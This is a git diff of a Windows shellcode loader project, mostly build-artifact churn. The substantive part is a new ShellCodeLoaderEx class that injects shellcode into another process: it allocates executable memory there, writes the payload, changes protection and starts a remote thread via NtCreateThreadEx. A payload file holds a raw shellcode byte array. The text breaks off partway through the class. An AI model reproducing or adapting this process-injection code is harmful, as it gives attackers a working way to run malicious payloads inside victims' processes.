diff --git a/.vs/ShellCodeLoader/v16/.suo b/.vs/ShellCodeLoader/v16/.suo
index 2faaea6..1035691 100644
Binary files a/.vs/ShellCodeLoader/v16/.suo and b/.vs/ShellCodeLoader/v16/.suo differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db b/.vs/ShellCodeLoader/v16/Browse.VC.db
index a00aa95..cad4441 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db and b/.vs/ShellCodeLoader/v16/Browse.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm
index 9f63776..e676db6 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm and b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db b/.vs/ShellCodeLoader/v16/Solution.VC.db
index 86bbea7..abe732c 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db and b/.vs/ShellCodeLoader/v16/Solution.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm
index ad86a11..78ff730 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm and b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal
index bfad33a..8c435cf 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal and b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal differ
diff --git a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 3e628d9..5dfb61c 100644
Binary files a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..1623316
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..850b656
--- /dev/null
+++ b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+f28cb18b6464b65741bdd61cdf8994c9416493a7
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..5741a0d
--- /dev/null
+++ b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt
@@ -0,0 +1,6 @@
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe.config
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.pdb
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.pdb
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.exe b/PayloadCSharp/obj/Debug/PayloadCSharp.exe
new file mode 100644
index 0000000..b67b8fc
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.exe differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.pdb b/PayloadCSharp/obj/Debug/PayloadCSharp.pdb
new file mode 100644
index 0000000..fd0091c
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.pdb differ
diff --git a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache
index d1579b8..f5e894a 100644
Binary files a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache
index 8ad0473..cf2ea7b 100644
Binary files a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCpp/Release/PayloadCpp.iobj b/PayloadCpp/Release/PayloadCpp.iobj
index 2122cdf..3ca0682 100644
Binary files a/PayloadCpp/Release/PayloadCpp.iobj and b/PayloadCpp/Release/PayloadCpp.iobj differ
diff --git a/PayloadCpp/Release/PayloadCpp.ipdb b/PayloadCpp/Release/PayloadCpp.ipdb
index 213ba64..4f6940c 100644
Binary files a/PayloadCpp/Release/PayloadCpp.ipdb and b/PayloadCpp/Release/PayloadCpp.ipdb differ
diff --git a/PayloadCpp/Release/PayloadCpp.log b/PayloadCpp/Release/PayloadCpp.log
index d6323d7..3d8ddc8 100644
--- a/PayloadCpp/Release/PayloadCpp.log
+++ b/PayloadCpp/Release/PayloadCpp.log
@@ -1,7 +1,7 @@
pch.cpp
dllmain.cpp
Génération de code en cours
- Previous IPDB not found, fall back to full compilation.
+ Previous IPDB was built with incompatible compiler, fall back to full compilation.
All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Fin de la génération du code
PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\Release\PayloadCpp.dll
diff --git a/PayloadCpp/Release/PayloadCpp.pch b/PayloadCpp/Release/PayloadCpp.pch
index cbb9167..42f42a3 100644
Binary files a/PayloadCpp/Release/PayloadCpp.pch and b/PayloadCpp/Release/PayloadCpp.pch differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog
index 0afe9e0..b4866e3 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog
index caa70be..47ae584 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
index 35c4dc2..c07b34d 100644
--- a/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
+++ b/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
Release|Win32|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog
index 67e931a..ed0f5c0 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/Release/dllmain.obj b/PayloadCpp/Release/dllmain.obj
index f7c3e20..62659b4 100644
Binary files a/PayloadCpp/Release/dllmain.obj and b/PayloadCpp/Release/dllmain.obj differ
diff --git a/PayloadCpp/Release/pch.obj b/PayloadCpp/Release/pch.obj
index e75dd3a..84c773a 100644
Binary files a/PayloadCpp/Release/pch.obj and b/PayloadCpp/Release/pch.obj differ
diff --git a/PayloadCpp/Release/vc142.pdb b/PayloadCpp/Release/vc142.pdb
index 21d3d1c..9dc8583 100644
Binary files a/PayloadCpp/Release/vc142.pdb and b/PayloadCpp/Release/vc142.pdb differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe b/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe
new file mode 100644
index 0000000..bdbdd42
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll
+
+
+
+
+
+
\ No newline at end of file
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.ilk b/PayloadCpp/x64/Debug/PayloadCpp.ilk
new file mode 100644
index 0000000..38e03e1
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.ilk differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.log b/PayloadCpp/x64/Debug/PayloadCpp.log
new file mode 100644
index 0000000..781f4c8
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.log
@@ -0,0 +1,3 @@
+ pch.cpp
+ dllmain.cpp
+ PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.pch b/PayloadCpp/x64/Debug/PayloadCpp.pch
new file mode 100644
index 0000000..59ac4ea
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.pch differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..0257628
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..a6437fb
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..39875b0
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate
new file mode 100644
index 0000000..efab2db
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+Debug|x64|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..b55ba4a
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..ecb0b87
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..c9eeb4f
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/dllmain.obj b/PayloadCpp/x64/Debug/dllmain.obj
new file mode 100644
index 0000000..f6a726b
Binary files /dev/null and b/PayloadCpp/x64/Debug/dllmain.obj differ
diff --git a/PayloadCpp/x64/Debug/pch.obj b/PayloadCpp/x64/Debug/pch.obj
new file mode 100644
index 0000000..8e28a03
Binary files /dev/null and b/PayloadCpp/x64/Debug/pch.obj differ
diff --git a/PayloadCpp/x64/Debug/vc142.idb b/PayloadCpp/x64/Debug/vc142.idb
new file mode 100644
index 0000000..004f1c2
Binary files /dev/null and b/PayloadCpp/x64/Debug/vc142.idb differ
diff --git a/PayloadCpp/x64/Debug/vc142.pdb b/PayloadCpp/x64/Debug/vc142.pdb
new file mode 100644
index 0000000..cf2a19e
Binary files /dev/null and b/PayloadCpp/x64/Debug/vc142.pdb differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.iobj b/PayloadCpp/x64/Release/PayloadCpp.iobj
index 01f6a92..41c191b 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.iobj and b/PayloadCpp/x64/Release/PayloadCpp.iobj differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.ipdb b/PayloadCpp/x64/Release/PayloadCpp.ipdb
index 2ec069b..183491e 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.ipdb and b/PayloadCpp/x64/Release/PayloadCpp.ipdb differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.log b/PayloadCpp/x64/Release/PayloadCpp.log
index a9b3dcb..11595c2 100644
--- a/PayloadCpp/x64/Release/PayloadCpp.log
+++ b/PayloadCpp/x64/Release/PayloadCpp.log
@@ -1,7 +1,6 @@
- pch.cpp
- dllmain.cpp
- Génération de code en cours
- Previous IPDB not found, fall back to full compilation.
- All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ Génération de code en cours
+ 0 of 1 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
Fin de la génération du code
PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Release\PayloadCpp.dll
diff --git a/PayloadCpp/x64/Release/PayloadCpp.pch b/PayloadCpp/x64/Release/PayloadCpp.pch
index 8d40ffe..5bb1970 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.pch and b/PayloadCpp/x64/Release/PayloadCpp.pch differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog
index 1ef95a6..7dde15f 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog
index 471e92a..a000923 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
index 7d42aaa..701005c 100644
--- a/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
+++ b/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
Release|x64|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog
index f098248..16f8571 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/x64/Release/dllmain.obj b/PayloadCpp/x64/Release/dllmain.obj
index 1a96d9f..520581b 100644
Binary files a/PayloadCpp/x64/Release/dllmain.obj and b/PayloadCpp/x64/Release/dllmain.obj differ
diff --git a/PayloadCpp/x64/Release/pch.obj b/PayloadCpp/x64/Release/pch.obj
index 8c536db..935993b 100644
Binary files a/PayloadCpp/x64/Release/pch.obj and b/PayloadCpp/x64/Release/pch.obj differ
diff --git a/PayloadCpp/x64/Release/vc142.pdb b/PayloadCpp/x64/Release/vc142.pdb
index 0107b62..be9e4de 100644
Binary files a/PayloadCpp/x64/Release/vc142.pdb and b/PayloadCpp/x64/Release/vc142.pdb differ
diff --git a/Payloads/PayloadCpp64.cs b/Payloads/PayloadCpp64.cs
index 470aa18..6466929 100644
--- a/Payloads/PayloadCpp64.cs
+++ b/Payloads/PayloadCpp64.cs
@@ -4,7 +4,8 @@
*/
namespace Test
{
- public class PayloadCpp64{
+ public class PayloadCpp64
+ {
public static byte[] rawData = {
0xE8, 0x80, 0x3D, 0x00, 0x00, 0x80, 0x3D, 0x00, 0x00, 0x0F, 0x21, 0x6B,
0xEB, 0xA9, 0xDF, 0xEA, 0x5F, 0x88, 0xCC, 0x42, 0xF0, 0xA3, 0x19, 0x64,
diff --git a/ShellCodeLoader.sln b/ShellCodeLoader.sln
index 7b17628..328d6de 100644
--- a/ShellCodeLoader.sln
+++ b/ShellCodeLoader.sln
@@ -23,8 +23,8 @@ Global
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Debug|Any CPU
- {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Debug|Any CPU
+ {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Release|Any CPU
+ {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Release|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.ActiveCfg = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.Build.0 = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
@@ -35,19 +35,19 @@ Global
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|x64
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Release|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Release|x64
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.ActiveCfg = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.ActiveCfg = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.Build.0 = Release|Any CPU
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|Any CPU.ActiveCfg = Debug|Win32
- {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|x64
- {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|x64
+ {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|Win32
+ {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.ActiveCfg = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.Build.0 = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Release|Any CPU.ActiveCfg = Release|x64
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index 0697279..b8a9edd 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -1,5 +1,6 @@
using System;
using System.Runtime.InteropServices;
+using System.Threading;
using System.Threading.Tasks;
using Microsoft.Win32.SafeHandles;
/*
@@ -9,6 +10,7 @@
*/
namespace ShellCodeLoader
{
+
public class ShellCodeLoader : IDisposable
{
private byte[] ShellCode;
@@ -34,10 +36,12 @@ public void LoadWithNT()
{
if (this.Asynchronous)
{
- Task.Run(() =>
+ Task.Factory.StartNew(() => { NT(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+ //Replace Task.Run with Task.Factory.StartNew for .net 4
+ /*Task.Run(() =>
{
NT();
- });
+ });*/
}
else
{
@@ -49,10 +53,7 @@ public void LoadWithKernel32()
{
if (this.Asynchronous)
{
- Task.Run(() =>
- {
- Kernel32();
- });
+ Task.Factory.StartNew(() => { Kernel32(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
}
else
{
@@ -64,10 +65,8 @@ public void LoadWithNTDelegates()
{
if (this.Asynchronous)
{
- Task.Run(() =>
- {
- NTDelegates();
- });
+ Task.Factory.StartNew(() => { NTDelegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+
}
else
{
@@ -79,7 +78,7 @@ public void LoadWithKernel32Delegates()
{
if (this.Asynchronous)
{
- Kernel32Delegates();
+ Task.Factory.StartNew(() => { Kernel32Delegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
}
else
{
@@ -167,26 +166,36 @@ private static class Imports
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
- public static extern IntPtr GetCurrentProcess();
+
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentProcess();
+
[DllImport(KERNEL32)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
+
[DllImport(KERNEL32)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 3d87c82..b7dc630 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -9,9 +9,10 @@
Properties
ShellCodeLoader
ShellCodeLoader
- v4.5
+ v4.0
512
true
+
true
@@ -29,6 +30,25 @@
TRACE
prompt
4
+ true
+
+
+ true
+ bin\x64\Debug\
+ DEBUG;TRACE
+ full
+ x64
+ 7.3
+ prompt
+
+
+ bin\x64\Release\
+ TRACE
+ true
+ pdbonly
+ x64
+ 7.3
+ prompt
@@ -37,6 +57,7 @@
+
\ No newline at end of file
diff --git a/ShellCodeLoader/ShellCodeLoaderEx.cs b/ShellCodeLoader/ShellCodeLoaderEx.cs
new file mode 100644
index 0000000..d571499
--- /dev/null
+++ b/ShellCodeLoader/ShellCodeLoaderEx.cs
@@ -0,0 +1,183 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+/*
+|| AUTHOR Arsium ||
+|| github : https://github.com/arsium ||
+|| Please let this credit for all the time I worked on ||
+ */
+namespace ShellCodeLoader
+{
+ public class ShellCodeLoaderEx
+ {
+ private byte[] ShellCode;
+ private IntPtr ptr;
+ private uint RegionSize;
+ private Process Target;
+
+ public ShellCodeLoaderEx(Process target, byte[] shellCode)
+ {
+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.ptr = IntPtr.Zero;
+ this.Target = target;
+ }
+
+ public void LoadWithNT()
+ {
+ NT();
+ }
+
+ public void LoadWithKernel32()
+ {
+ Kernel32();
+ }
+
+ private void NT()
+ {
+ Imports.NtAllocateVirtualMemory(Target.Handle, ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr bytesWritten;
+ Imports.NtWriteVirtualMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ Imports.NtProtectVirtualMemory(Target.Handle, ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ IntPtr hThread = IntPtr.Zero;
+ Imports.NtCreateThreadEx(ref hThread, Imports.AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, ptr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
+ }
+
+ private void Kernel32()
+ {
